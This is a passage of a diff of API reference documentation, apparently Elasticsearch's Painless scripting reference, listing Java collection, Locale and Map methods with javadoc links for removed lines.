{java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-LinkedHashSet]] -==== LinkedHashSet -* {java11-javadoc}/java.base/java/util/LinkedHashSet.html#()[LinkedHashSet]() -* {java11-javadoc}/java.base/java/util/LinkedHashSet.html#(java.util.Collection)[LinkedHashSet](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/HashSet.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LinkedList]] -==== LinkedList -* {java11-javadoc}/java.base/java/util/LinkedList.html#()[LinkedList]() -* {java11-javadoc}/java.base/java/util/LinkedList.html#(java.util.Collection)[LinkedList](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* void {java11-javadoc}/java.base/java/util/Deque.html#addFirst(java.lang.Object)[addFirst](def) -* void {java11-javadoc}/java.base/java/util/Deque.html#addLast(java.lang.Object)[addLast](def) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/LinkedList.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* Iterator {java11-javadoc}/java.base/java/util/Deque.html#descendingIterator()[descendingIterator]() -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Queue.html#element()[element]() -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Deque.html#getFirst()[getFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#getLast()[getLast]() -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* boolean {java11-javadoc}/java.base/java/util/Queue.html#offer(java.lang.Object)[offer](def) -* boolean {java11-javadoc}/java.base/java/util/Deque.html#offerFirst(java.lang.Object)[offerFirst](def) -* boolean {java11-javadoc}/java.base/java/util/Deque.html#offerLast(java.lang.Object)[offerLast](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Deque.html#peekFirst()[peekFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#peekLast()[peekLast]() -* def {java11-javadoc}/java.base/java/util/Queue.html#poll()[poll]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pollFirst()[pollFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pollLast()[pollLast]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pop()[pop]() -* void {java11-javadoc}/java.base/java/util/Deque.html#push(java.lang.Object)[push](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#remove()[remove]() -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* def {java11-javadoc}/java.base/java/util/Deque.html#removeFirst()[removeFirst]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#removeFirstOccurrence(java.lang.Object)[removeFirstOccurrence](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* def {java11-javadoc}/java.base/java/util/Deque.html#removeLast()[removeLast]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#removeLastOccurrence(java.lang.Object)[removeLastOccurrence](def) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-List]] -==== List -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ListIterator]] -==== ListIterator -* void {java11-javadoc}/java.base/java/util/ListIterator.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/Iterator.html#forEachRemaining(java.util.function.Consumer)[forEachRemaining](Consumer) -* boolean {java11-javadoc}/java.base/java/util/Iterator.html#hasNext()[hasNext]() -* boolean {java11-javadoc}/java.base/java/util/ListIterator.html#hasPrevious()[hasPrevious]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Iterator.html#next()[next]() -* int {java11-javadoc}/java.base/java/util/ListIterator.html#nextIndex()[nextIndex]() -* int {java11-javadoc}/java.base/java/util/ListIterator.html#previousIndex()[previousIndex]() -* void {java11-javadoc}/java.base/java/util/Iterator.html#remove()[remove]() -* void {java11-javadoc}/java.base/java/util/ListIterator.html#set(java.lang.Object)[set](def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Locale]] -==== Locale -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#CANADA[CANADA] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#CANADA_FRENCH[CANADA_FRENCH] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#CHINA[CHINA] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#CHINESE[CHINESE] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#ENGLISH[ENGLISH] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#FRANCE[FRANCE] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#FRENCH[FRENCH] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#GERMAN[GERMAN] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#GERMANY[GERMANY] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#ITALIAN[ITALIAN] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#ITALY[ITALY] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#JAPAN[JAPAN] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#JAPANESE[JAPANESE] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#KOREA[KOREA] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#KOREAN[KOREAN] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#PRC[PRC] -* static char {java11-javadoc}/java.base/java/util/Locale.html#PRIVATE_USE_EXTENSION[PRIVATE_USE_EXTENSION] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#ROOT[ROOT] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#SIMPLIFIED_CHINESE[SIMPLIFIED_CHINESE] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#TAIWAN[TAIWAN] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#TRADITIONAL_CHINESE[TRADITIONAL_CHINESE] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#UK[UK] -* static char {java11-javadoc}/java.base/java/util/Locale.html#UNICODE_LOCALE_EXTENSION[UNICODE_LOCALE_EXTENSION] -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#US[US] -* static List {java11-javadoc}/java.base/java/util/Locale.html#filter(java.util.List,java.util.Collection)[filter](List, Collection) -* static List {java11-javadoc}/java.base/java/util/Locale.html#filterTags(java.util.List,java.util.Collection)[filterTags](List, Collection) -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#forLanguageTag(java.lang.String)[forLanguageTag](null) -* static Locale[] {java11-javadoc}/java.base/java/util/Locale.html#getAvailableLocales()[getAvailableLocales]() -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#getDefault()[getDefault]() -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#getDefault(java.util.Locale$Category)[getDefault](Locale.Category) -* static null[] {java11-javadoc}/java.base/java/util/Locale.html#getISOCountries()[getISOCountries]() -* static null[] {java11-javadoc}/java.base/java/util/Locale.html#getISOLanguages()[getISOLanguages]() -* static Locale {java11-javadoc}/java.base/java/util/Locale.html#lookup(java.util.List,java.util.Collection)[lookup](List, Collection) -* static null {java11-javadoc}/java.base/java/util/Locale.html#lookupTag(java.util.List,java.util.Collection)[lookupTag](List, Collection) -* {java11-javadoc}/java.base/java/util/Locale.html#(java.lang.String)[Locale](null) -* {java11-javadoc}/java.base/java/util/Locale.html#(java.lang.String,java.lang.String)[Locale](null, null) -* {java11-javadoc}/java.base/java/util/Locale.html#(java.lang.String,java.lang.String,java.lang.String)[Locale](null, null, null) -* def {java11-javadoc}/java.base/java/util/Locale.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/Locale.html#getCountry()[getCountry]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayCountry()[getDisplayCountry]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayCountry(java.util.Locale)[getDisplayCountry](Locale) -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayLanguage()[getDisplayLanguage]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayLanguage(java.util.Locale)[getDisplayLanguage](Locale) -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayName()[getDisplayName]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayName(java.util.Locale)[getDisplayName](Locale) -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayScript()[getDisplayScript]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayScript(java.util.Locale)[getDisplayScript](Locale) -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayVariant()[getDisplayVariant]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getDisplayVariant(java.util.Locale)[getDisplayVariant](Locale) -* null {java11-javadoc}/java.base/java/util/Locale.html#getExtension(char)[getExtension](char) -* Set {java11-javadoc}/java.base/java/util/Locale.html#getExtensionKeys()[getExtensionKeys]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getISO3Country()[getISO3Country]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getISO3Language()[getISO3Language]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getLanguage()[getLanguage]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getScript()[getScript]() -* Set {java11-javadoc}/java.base/java/util/Locale.html#getUnicodeLocaleAttributes()[getUnicodeLocaleAttributes]() -* Set {java11-javadoc}/java.base/java/util/Locale.html#getUnicodeLocaleKeys()[getUnicodeLocaleKeys]() -* null {java11-javadoc}/java.base/java/util/Locale.html#getUnicodeLocaleType(java.lang.String)[getUnicodeLocaleType](null) -* null {java11-javadoc}/java.base/java/util/Locale.html#getVariant()[getVariant]() -* boolean {java11-javadoc}/java.base/java/util/Locale.html#hasExtensions()[hasExtensions]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Locale {java11-javadoc}/java.base/java/util/Locale.html#stripExtensions()[stripExtensions]() -* null {java11-javadoc}/java.base/java/util/Locale.html#toLanguageTag()[toLanguageTag]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Locale-Builder]] -==== Locale.Builder -* {java11-javadoc}/java.base/java/util/Locale$Builder.html#()[Locale.Builder]() -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#addUnicodeLocaleAttribute(java.lang.String)[addUnicodeLocaleAttribute](null) -* Locale {java11-javadoc}/java.base/java/util/Locale$Builder.html#build()[build]() -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#clear()[clear]() -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#clearExtensions()[clearExtensions]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#removeUnicodeLocaleAttribute(java.lang.String)[removeUnicodeLocaleAttribute](null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setExtension(char,java.lang.String)[setExtension](char, null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setLanguage(java.lang.String)[setLanguage](null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setLanguageTag(java.lang.String)[setLanguageTag](null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setLocale(java.util.Locale)[setLocale](Locale) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setRegion(java.lang.String)[setRegion](null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setScript(java.lang.String)[setScript](null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setUnicodeLocaleKeyword(java.lang.String,java.lang.String)[setUnicodeLocaleKeyword](null, null) -* Locale.Builder {java11-javadoc}/java.base/java/util/Locale$Builder.html#setVariant(java.lang.String)[setVariant](null) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Locale-Category]] -==== Locale.Category -* static Locale.Category {java11-javadoc}/java.base/java/util/Locale$Category.html#DISPLAY[DISPLAY] -* static Locale.Category {java11-javadoc}/java.base/java/util/Locale$Category.html#FORMAT[FORMAT] -* static Locale.Category {java11-javadoc}/java.base/java/util/Locale$Category.html#valueOf(java.lang.String)[valueOf](null) -* static Locale.Category[] {java11-javadoc}/java.base/java/util/Locale$Category.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Locale-FilteringMode]] -==== Locale.FilteringMode -* static Locale.FilteringMode {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#AUTOSELECT_FILTERING[AUTOSELECT_FILTERING] -* static Locale.FilteringMode {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#EXTENDED_FILTERING[EXTENDED_FILTERING] -* static Locale.FilteringMode {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#IGNORE_EXTENDED_RANGES[IGNORE_EXTENDED_RANGES] -* static Locale.FilteringMode {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#MAP_EXTENDED_RANGES[MAP_EXTENDED_RANGES] -* static Locale.FilteringMode {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#REJECT_EXTENDED_RANGES[REJECT_EXTENDED_RANGES] -* static Locale.FilteringMode {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#valueOf(java.lang.String)[valueOf](null) -* static Locale.FilteringMode[] {java11-javadoc}/java.base/java/util/Locale$FilteringMode.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Locale-LanguageRange]] -==== Locale.LanguageRange -* static double {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#MAX_WEIGHT[MAX_WEIGHT] -* static double {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#MIN_WEIGHT[MIN_WEIGHT] -* static List {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#mapEquivalents(java.util.List,java.util.Map)[mapEquivalents](List, Map) -* static List {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#parse(java.lang.String)[parse](null) -* static List {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#parse(java.lang.String,java.util.Map)[parse](null, Map) -* {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#(java.lang.String)[Locale.LanguageRange](null) -* {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#(java.lang.String,double)[Locale.LanguageRange](null, double) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#getRange()[getRange]() -* double {java11-javadoc}/java.base/java/util/Locale$LanguageRange.html#getWeight()[getWeight]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LongSummaryStatistics]] -==== LongSummaryStatistics -* {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#()[LongSummaryStatistics]() -* void {java11-javadoc}/java.base/java/util/function/LongConsumer.html#accept(long)[accept](long) -* LongConsumer {java11-javadoc}/java.base/java/util/function/LongConsumer.html#andThen(java.util.function.LongConsumer)[andThen](LongConsumer) -* void {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#combine(java.util.LongSummaryStatistics)[combine](LongSummaryStatistics) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* double {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#getAverage()[getAverage]() -* long {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#getCount()[getCount]() -* long {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#getMax()[getMax]() -* long {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#getMin()[getMin]() -* long {java11-javadoc}/java.base/java/util/LongSummaryStatistics.html#getSum()[getSum]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Map]] -==== Map -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-Map-Entry]] -==== Map.Entry -* static Comparator {java11-javadoc}/java.base/java/util/Map$Entry.html#comparingByKey()[comparingByKey]() -* static Comparator {java11-javadoc}/java.base/java/util/Map$Entry.html#comparingByKey(java.util.Comparator)[comparingByKey](Comparator) -* static Comparator {java11-javadoc}/java.base/java/util/Map$Entry.html#comparingByValue()[comparingByValue]() -* static Comparator {java11-javadoc}/java.base/java/util/Map$Entry.html#comparingByValue(java.util.Comparator)[comparingByValue](Comparator) -* boolean {java11-javadoc}/java.base/java/util/Map$Entry.html#equals(java.lang.Object)[equals](Object) -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#getKey()[getKey]() -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/util/Map$Entry.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Map$Entry.html#setValue(java.lang.Object)[setValue](def) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-MissingFormatArgumentException]] -==== MissingFormatArgumentException -* 